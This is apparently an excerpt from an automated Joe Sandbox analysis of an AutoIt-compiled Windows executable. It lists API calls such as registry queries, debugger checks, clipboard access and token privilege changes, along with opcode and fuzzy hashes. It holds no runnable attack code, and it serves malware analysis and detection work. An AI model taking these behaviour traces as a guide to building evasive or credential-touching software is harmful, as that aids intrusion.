                                                            • Instruction Fuzzy Hash: 8A414162A086C696EF20FB20F4442F9A361FB84348FC85431E64D0369AEF7CE648C761
                                                            APIs
                                                            • GetOpenFileNameW.COMDLG32 ref: 00007FF75F18BAA2
                                                              • Part of subcall function 00007FF75F1456D4: GetFullPathNameW.KERNEL32(?,00007FF75F1456C1,?,00007FF75F147A0C,?,?,?,00007FF75F14109E), ref: 00007FF75F1456FF
                                                              • Part of subcall function 00007FF75F143EB4: GetLongPathNameW.KERNELBASE ref: 00007FF75F143ED8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen
                                                            • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                            • API String ID: 779396738-2360590182
                                                            • Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                            • Instruction ID: f7d4c244f3abc2fca6ce9970d589bce4069e9b8220c3243a51ec6b2c22c256bd
                                                            • Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                            • Instruction Fuzzy Hash: 91312C72A08BC289EB10EB21E8441EDB7A4FB89B84F984135DE8C47B99DF7CD545C760
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer$Killwcscpy
                                                            • String ID:
                                                            • API String ID: 3812282468-0
                                                            • Opcode ID: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                            • Instruction ID: 9f855460a3dd269ed1107e0bfe838cfdc8c93a886861b644ebc13619f5d682d1
                                                            • Opcode Fuzzy Hash: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                            • Instruction Fuzzy Hash: 84318162A097C287EF61AB21A1502FDBB98E745F88F9C4035DE8D07749DF2CD64587B0
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF75F146F52,?,?,?,?,?,?,00007FF75F14782C), ref: 00007FF75F146FA5
                                                            • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF75F146F52,?,?,?,?,?,?,00007FF75F14782C), ref: 00007FF75F146FD3
                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF75F146F52,?,?,?,?,?,?,00007FF75F14782C), ref: 00007FF75F146FFA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID:
                                                            • API String ID: 3677997916-0
                                                            • Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                            • Instruction ID: 0f87f320c1263a263bfbe9e86d32777f787adb0d097ccce9d75900ca04180d2c
                                                            • Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                            • Instruction Fuzzy Hash: 0A219F33A1878187DB10AF15F4549AEB3A4FB89B84B881531DB8D83B14EF3AE815CB54
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                            • Instruction ID: e409a186169d662975d4d36accc2e00bd0e7cd0303689d031c9eab10aec4ebc4
                                                            • Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                            • Instruction Fuzzy Hash: E2E07520B047C583EF547B65A8992B9A656AF88B51FD95438C90E06792CF2DE8498270
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID: CALL
                                                            • API String ID: 1385522511-4196123274
                                                            • Opcode ID: 278cfb30bd3ca7767d208b8ebc54255a4a2aa9310e72bb4b170a940d14afb9b0
                                                            • Instruction ID: 9bcff1e2d0df980f1fa260336f748e3441120d6653d29c61073b830065028f0e
                                                            • Opcode Fuzzy Hash: 278cfb30bd3ca7767d208b8ebc54255a4a2aa9310e72bb4b170a940d14afb9b0
                                                            • Instruction Fuzzy Hash: 40227B72B086C18AEF10EF69E0402ECB7A1FB54B88F984136CA4D5B795DF39E455C7A0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                            • Instruction ID: c92d1135bb993e6cbac9f7acab0d6697de954a7238776588a5b8fb78fea38af2
                                                            • Opcode Fuzzy Hash: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                            • Instruction Fuzzy Hash: 43417C72D08B8282FB60BF11F4443BAF7A0AB85BA8F884231DA6D076C5DF3DD4058751
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$AddressFreeProc
                                                            • String ID:
                                                            • API String ID: 2632591731-0
                                                            • Opcode ID: 392ad9f8a410b3ba7add488219b3c7835b0d92f2120495b543ba498714cf74fb
                                                            • Instruction ID: 3f6ef9ce162dfa2233263ab24f9c280305654ce0d38422013b7c6e5507a0d050
                                                            • Opcode Fuzzy Hash: 392ad9f8a410b3ba7add488219b3c7835b0d92f2120495b543ba498714cf74fb
                                                            • Instruction Fuzzy Hash: FC412E22E14A9286EF10FB65E4553FCA3A0AB8478CF894131EA4D47699EF3CD945C760
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_
                                                            • String ID:
                                                            • API String ID: 1144537725-0
                                                            • Opcode ID: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                            • Instruction ID: fdcef225c5ee8454447b9c16259fd10816fc843575b9c49ab1f6e2d6c8c651c5
                                                            • Opcode Fuzzy Hash: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                            • Instruction Fuzzy Hash: 4B414A71909BC686EB51EF11F4443A9B3A4FB48B88F880139DA4C07799DF7CE654C720
                                                            APIs
                                                            • IsThemeActive.UXTHEME ref: 00007FF75F143756
                                                              • Part of subcall function 00007FF75F169334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75F169348
                                                              • Part of subcall function 00007FF75F1436E8: SystemParametersInfoW.USER32 ref: 00007FF75F143705
                                                              • Part of subcall function 00007FF75F1436E8: SystemParametersInfoW.USER32 ref: 00007FF75F143725
                                                              • Part of subcall function 00007FF75F1437B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF75F143785), ref: 00007FF75F1437F2
                                                              • Part of subcall function 00007FF75F1437B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF75F143785), ref: 00007FF75F143807
                                                              • Part of subcall function 00007FF75F1437B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF75F143785), ref: 00007FF75F14388D
                                                              • Part of subcall function 00007FF75F1437B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF75F143785), ref: 00007FF75F143924
                                                            • SystemParametersInfoW.USER32 ref: 00007FF75F143797
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 4207566314-0
                                                            • Opcode ID: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                            • Instruction ID: fb59efc9269a051c30e924638568110cb652b99d7dbd19a431f2b9559cd232cc
                                                            • Opcode Fuzzy Hash: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                            • Instruction Fuzzy Hash: A001C0E0E482C68BFB04FBA1A8551E9E6A1AF48709FCC0035D54D872A2DF2DA4859731
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 485612231-0
                                                            • Opcode ID: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                            • Instruction ID: dc38520237c646118ff18ad9d0321765442489c6e29b2c7fa7a7d7add6f4423d
                                                            • Opcode Fuzzy Hash: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                            • Instruction Fuzzy Hash: 0FE08650F0A1C382FF04BBF278440F8A6915F44B50FCC4034C90D86252DF2CD8864A70
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CloseErrorHandleLast
                                                            • String ID:
                                                            • API String ID: 918212764-0
                                                            • Opcode ID: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                            • Instruction ID: f0ef53532d9312a7feee500081bad18184954e62da41d8e6cb007f84e43d3c9e
                                                            • Opcode Fuzzy Hash: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                            • Instruction Fuzzy Hash: B0119351B0C6CA41FEA4B774B6942FD96D15F94B64FCC0238EA2E072D2DF6CA8448332
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID:
                                                            • API String ID: 1385522511-0
                                                            • Opcode ID: 14d8bcb0f5e5d36dc6dc2465f5c4b4e36f70afd0639fb95ae083af4e2f9187f7
                                                            • Instruction ID: 683bc6835a6df585448d3103fc3f895ff7ed2f1ee08779e7f9a536f108354565
                                                            • Opcode Fuzzy Hash: 14d8bcb0f5e5d36dc6dc2465f5c4b4e36f70afd0639fb95ae083af4e2f9187f7
                                                            • Instruction Fuzzy Hash: 7732B062A086C286EF65EB1AE5402F9E361FB84B84F8C4131DE4E17795EF3DE541CB20
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
                                                            • Instruction ID: fb55ecb0532c207036aa12e112e8a8052bce5d9c418fc3b49a2fc3912d2d15cd
                                                            • Opcode Fuzzy Hash: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
                                                            • Instruction Fuzzy Hash: 7F414E22B08AC18AEF11EF65E0503EDA7A1EB54B88F884535CE0D57795CF7CE495C7A0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                            • String ID:
                                                            • API String ID: 3947729631-0
                                                            • Opcode ID: 79a8f9e3fe50e3bd62fad2946b9f3cab9d1411ae91e96718622d0c848b5f8289
                                                            • Instruction ID: 13441e88f40051dc57146a1961d2be50c94fb7e761cc8e87a0ef3a13538b0126
                                                            • Opcode Fuzzy Hash: 79a8f9e3fe50e3bd62fad2946b9f3cab9d1411ae91e96718622d0c848b5f8289
                                                            • Instruction Fuzzy Hash: 90418161E0D6D283EF54BB55F8502F8A266AF40B40FDC4039DA0E4BAD1DF7EE8418760
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            APIs
                                                              • Part of subcall function 00007FF75F174970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75F174999
                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF75F18C8FE), ref: 00007FF75F14656F
                                                            Similarity
                                                            • API ID: FreeLibrary_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3938577545-0
                                                            APIs
                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF75F164C5C
                                                              • Part of subcall function 00007FF75F165600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF75F165609
                                                              • Part of subcall function 00007FF75F165600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF75F16561A
                                                            Similarity
                                                            • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 1680350287-0
                                                            APIs
                                                            Similarity
                                                            • API ID: CriticalDeleteSection
                                                            • String ID:
                                                            • API String ID: 166494926-0
                                                            APIs
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            APIs
                                                            Similarity
                                                            • API ID: LongNamePath
                                                            • String ID:
                                                            • API String ID: 82841172-0
                                                            APIs
                                                            Similarity
                                                            • API ID: IconNotifyShell_
                                                            • String ID:
                                                            • API String ID: 1144537725-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Open_onexit
                                                            • String ID:
                                                            • API String ID: 3030063568-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _onexit
                                                            • String ID:
                                                            • API String ID: 572287377-0
                                                            Similarity
                                                            • API ID: _onexit
                                                            • String ID:
                                                            • API String ID: 572287377-0
                                                            Similarity
                                                            • API ID: Process$CurrentVersionWow64_onexit
                                                            • String ID:
                                                            • API String ID: 2932345936-0
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            Similarity
                                                            • API ID: AllocHeap
                                                            • String ID:
                                                            • API String ID: 4292702814-0
                                                            Similarity
                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                            • API String ID: 2211948467-2373415609
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$LongStateWindow$CursorMenuPopupTrack$ParentProc
                                                            • String ID: @GUI_DRAGID$F
                                                            • API String ID: 1993697042-4164748364
                                                            Similarity
                                                            • API ID: DeleteDestroyIconImageLoadLongMessageObjectSendWindow
                                                            • String ID:
                                                            • API String ID: 3481653762-0
                                                            Similarity
                                                            • API ID: MessageSend$Window$LongMenuText$CharInfoItemNextwsprintf
                                                            • String ID: %d/%02d/%02d
                                                            • API String ID: 1218376639-328681919
                                                            Similarity
                                                            • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                            • String ID: P
                                                            • API String ID: 1208186926-3110715001
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-2439800395
                                                            Similarity
                                                            • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                            • String ID:
                                                            • API String ID: 3372153169-0
                                                            Similarity
                                                            • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                            • String ID: default$winsta0$winsta0\default
                                                            • API String ID: 3202303201-1423368268
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: AutoIt v3 GUI
                                                            • API String ID: 1458621304-248962490
                                                            • Opcode ID: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                            • Instruction ID: 80de3b79d0e85ef42c357fed24b2216ef184bc67b37fd0ec6015d7fab015fe83
                                                            • Opcode Fuzzy Hash: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                            • Instruction Fuzzy Hash: 46D16D72A046868BEB14EF78E8547EC77A1FB84B58F940135DA0E47AA8DF3CE445C760
                                                            APIs
                                                            Similarity
                                                            • API ID: memcpy_s$_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2880407647-0
                                                            • Opcode ID: 58aa0ebf662a58accb0a9b8196807729812b5725d699f5f78ac16d2d228f8c2a
                                                            • Instruction ID: fd1252b3eb948a1e10040cce5780c225f736779436045edd978ad0dd625ad3e9
                                                            • Opcode Fuzzy Hash: 58aa0ebf662a58accb0a9b8196807729812b5725d699f5f78ac16d2d228f8c2a
                                                            • Instruction Fuzzy Hash: 8E03D772A092C28BDB759E25E440BFDB7A5F79478CF880135DA0E67B58DF38A940CB50
                                                            APIs
                                                            Similarity
                                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                            • String ID:
                                                            • API String ID: 3222323430-0
                                                            • Opcode ID: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                            • Instruction ID: 7a6da41c11cb0be30a301f60b734e35a8162fffd16a3b9da6a8a6cc5c8ebf9ae
                                                            • Opcode Fuzzy Hash: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
